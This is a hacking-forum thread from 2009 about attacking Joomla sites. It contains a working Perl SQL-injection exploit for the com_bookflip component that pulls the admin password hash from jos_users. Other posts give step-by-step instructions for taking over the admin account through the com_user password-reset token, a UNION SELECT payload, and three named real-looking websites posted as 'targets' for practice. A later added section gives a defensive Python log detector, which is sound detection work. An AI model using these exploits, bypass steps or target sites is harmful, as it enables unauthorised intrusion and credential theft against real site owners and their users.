joomla hack

Forum for discussing everything about web hacking, from footprinting, scanning, gaining access, escalating privileges, exploitation, covering tracks and backdoors through to securing websites

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Discusses bugs, penetration, exploitation and techniques for securing websites and web servers. Include a PoC here so that members can study it
j.gladiator
Posts: 35
Joined: Sat Dec 27, 2008 1:19 pm
Location: long island

Re: joomla hack

Post by j.gladiator » Wed Jul 01, 2009 4:07 pm

I haven't tried it myself yet, but... I just wanted to share it here.... (source: milw0rm)

#!/usr/bin/perl -w

#Joomla com_bookflip(book_id) Sql injection#
########################################
#[~] Author : boom3rang
#[~] Greetz : H!tm@N - KHG - cHs - LiTTLE-HaCkEr - SpywarrioR - cRu3l.b0y - Lanti-Net - urtan
#---------------------------------------
#[!] <name>BookFlip</name>
#[!] <creationDate>Juin 2008</creationDate>
#[!] <author>FCI F-Cimag-In</author>
#[!] <copyright>Ce composant est distribué gratuitement.</copyright>
#[!] <authorEmail>[email protected]</authorEmail>
#[!] <authorUrl>www.f-cimag-in.com</authorUrl>
#[!] <version>2.1</version>
#---------------------------------------
#[!] Google_Dork: inurl:"com_bookflip"
########################################

system("color FF0000");
print "\t ###############################################################\n\n";
print "\t # Kosova Hackers Group (KHG-CREW) #\n\n";
print "\t ###############################################################\n\n";
print "\t # - Joomla com_bookflip(book_id)Remote SQL Injection Vuln #\n\n";
print "\t # - R.I.P redc00de #\n\n";
print "\t # - Cod3d by boom3rang #\n\n";
print "\t ###############################################################\n\n";
use LWP::UserAgent;
print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
chomp(my $target=<STDIN>);
#Column Name
$c_n="concat(username,0x3a,password)";
#Table_name
$t_n="jos_users";
$U="-9999+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_bookflip&book_id=".$U."1,".$c_n.",3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/".$t_n."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";
}
else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";
}

########################
# - Proud 2 be Albanian
# - Proud 2 be Muslim
########################

# milw0rm.com [2009-06-29]
^nothing specials 4 my self^
life is full of colour
=====================================================================
-live-is-short-

zarskycrew
Posts: 16
Joined: Wed Apr 01, 2009 4:51 pm

Re: joomla hack

Post by zarskycrew » Sat Jul 04, 2009 12:13 am

j.gladiator wrote: first, go to google.com
second, enter this
inurl:option=com_user
next..
target:
for example: >>>>>http://situstarget.com/index.php?option ... view=reset<<<<<
is changed to
>>>>>http://situstarget.com/index.php?option ... ut=confirm<<<<<<
after that a token field will appear
fill it in with ' <----------- why does it have to be this character ---------->'
just give it a try..
after that, password and verify password fields will appear
fill them in with whatever you like
after that, log in
with the username Admin and the password you just entered
after that
admin is now yours...
done.....

after I've reset the password, logging in keeps failing ..
is the username wrong or something?
how do I find out the username??

Quick_5ilv3r
Posts: 6
Joined: Sun Mar 29, 2009 7:34 pm
Location: Local Disck X

Re: joomla hack

Post by Quick_5ilv3r » Sat Jul 04, 2009 9:02 pm

cool, bro, but it's old.. :D

mahaja
Posts: 2
Joined: Wed May 07, 2008 3:12 pm

Re: joomla hack

Post by mahaja » Wed Jul 15, 2009 1:16 pm

yup....

the method is correct ....

but that's old, bro...

but that's fine, we're just sharing with each other...
keep experimenting...

vodork
Posts: 191
Joined: Wed Jun 10, 2009 1:52 am
Location: jogja/sarkem

Re: joomla hack

Post by vodork » Mon Jul 20, 2009 9:45 am

wow, nice too :D :D
but that one's old as well :roll: :roll:
on to finding new ones :twisted: :twisted:

lock
.::[love grows out of familiarity]::.

.::[once you're used to it]::.

.::[it's up to you]::.

shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: joomla hack

Post by shad.hckr » Mon Jul 20, 2009 11:50 am

site: Joomla
dork: com_category
method: SQLi
credits: milw0rm

Code: Select all

http://www.epsau.com.au/index.php?option=com_category&task=loadCategory&catid=12

http://www.hendrygroup.com.au/index.php?option=com_category&task=loadCategory&catid=11

http://www.hgau.com.au/index.php?option=com_category&task=loadCategory&catid=131
here are some targets.. you can get the password too.. good for practising SQLi while you're at it..
this is Joomla, but it takes advantage of an SQL hole. if you don't know how yet, just search this forum, bro..

Sniffer_Vandal
Posts: 8
Joined: Tue Jan 13, 2009 11:44 am

Re: joomla hack

Post by Sniffer_Vandal » Sun Aug 23, 2009 8:49 pm

Fun stuff, keep going. I want to learn SQL injection
Ooh, where can I learn it...?
So I can learn it fast...?
ooh, I want to be able to do SQL injection...
hehehehehehe....
DON'T SAY THAT YOU ARE SMARTER...
BECAUSE OUT THERE THERE ARE STILL PLENTY WHO ARE SMARTER THAN US....

.::Z10R::.
Posts: 34
Joined: Wed Jul 16, 2008 3:23 pm

Re: joomla hack

Post by .::Z10R::. » Mon Aug 24, 2009 12:42 pm

Sniffer_Vandal wrote: Fun stuff, keep going. I want to learn SQL injection
Ooh, where can I learn it...?
So I can learn it fast...?
ooh, I want to be able to do SQL injection...
hehehehehehe....
you want to learn, yet you want it instantly :)
Trying to retire from online games

Sniffer_Vandal
Posts: 8
Joined: Tue Jan 13, 2009 11:44 am

Re: joomla hack

Post by Sniffer_Vandal » Mon Oct 19, 2009 8:11 pm

.::Z10R::. wrote:
Sniffer_Vandal wrote: Fun stuff, keep going. I want to learn SQL injection
Ooh, where can I learn it...?
So I can learn it fast...?
ooh, I want to be able to do SQL injection...
hehehehehehe....
you want to learn, yet you want it instantly :)
What is this, instant NOODLES...?
hahahahahahahahahaha.....

Nice bro, just kidding...!!!
we learn slowly...
so far I can only display the version
after displaying the version, what comes next...?

example: index.php?id=-100+union+all+select 1,2,@@version,4--

so after that, what else...?
can anyone help?
DON'T SAY THAT YOU ARE SMARTER...
BECAUSE OUT THERE THERE ARE STILL PLENTY WHO ARE SMARTER THAN US....
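
For defenders: the requests posted in this thread put SQL into parameters that should only ever hold a numeric id (book_id, catid, id), and that leaves a recognisable trace in web server access logs. The following is an added example, not part of any forum post; it flags non-numeric id values and SQL markers after URL decoding. The parameter list, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters that the requests in this thread use as numeric record ids.
NUMERIC_PARAMS = {"book_id", "catid", "id"}
# Markers taken from the posted payloads, matched after URL decoding.
SQLI_MARKERS = re.compile(
    r"union\s+(?:all\s+)?select|concat\s*\(|@@version|jos_users", re.I)
# Inline comments standing in for spaces, as in from/**/jos_users.
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jul/2009:16:07:00 +0700] '
    '"GET /index.php?option=com_bookflip&book_id=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jul/2009:16:09:41 +0700] '
    '"GET /index.php?option=com_bookflip&book_id=-9999+UNION+SELECT+1,'
    'concat(username,0x3a,password),3+from/**/jos_users+--+ HTTP/1.1" 200 6210',
    '198.51.100.9 - - [01/Jul/2009:16:10:02 +0700] '
    '"GET /index.php?id=-100+union+all+select%201,2,@@version,4-- HTTP/1.1" 200 900',
]


def inspect_request(log_line):
    """Return (client, findings) for one line; findings are (param, reason)."""
    m = REQUEST.search(log_line)
    if not m:
        return None, []
    client, target = m.groups()
    findings = []
    # parse_qsl decodes %xx and turns '+' into a space, as the server would.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            findings.append((name, "non-numeric id"))
        if SQLI_MARKERS.search(INLINE_COMMENT.sub(" ", value)):
            findings.append((name, "sql marker"))
    return client, findings


def suspicious_clients(lines):
    """Map each client address to the number of flagged requests it sent."""
    counts = {}
    for line in lines:
        client, findings = inspect_request(line)
        if findings:
            counts[client] = counts.get(client, 0) + 1
    return counts
```

Calling `suspicious_clients(SAMPLE_LOG)` reports the one constructed client that sent the two injected requests. The non-numeric check is the stronger signal, because it matches the server-side fix: an id that is cast to an integer before it reaches the query cannot carry a UNION clause.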

blackxnovo
Posts: 20
Joined: Fri Jan 15, 2010 2:43 am
Location: anywhere

Re: joomla hack

Post by blackxnovo » Fri Jan 15, 2010 8:47 am

confusing!
the explanation isn't clear!
bro... please make it clearer.
thanks in advance.
Jong Ambonese
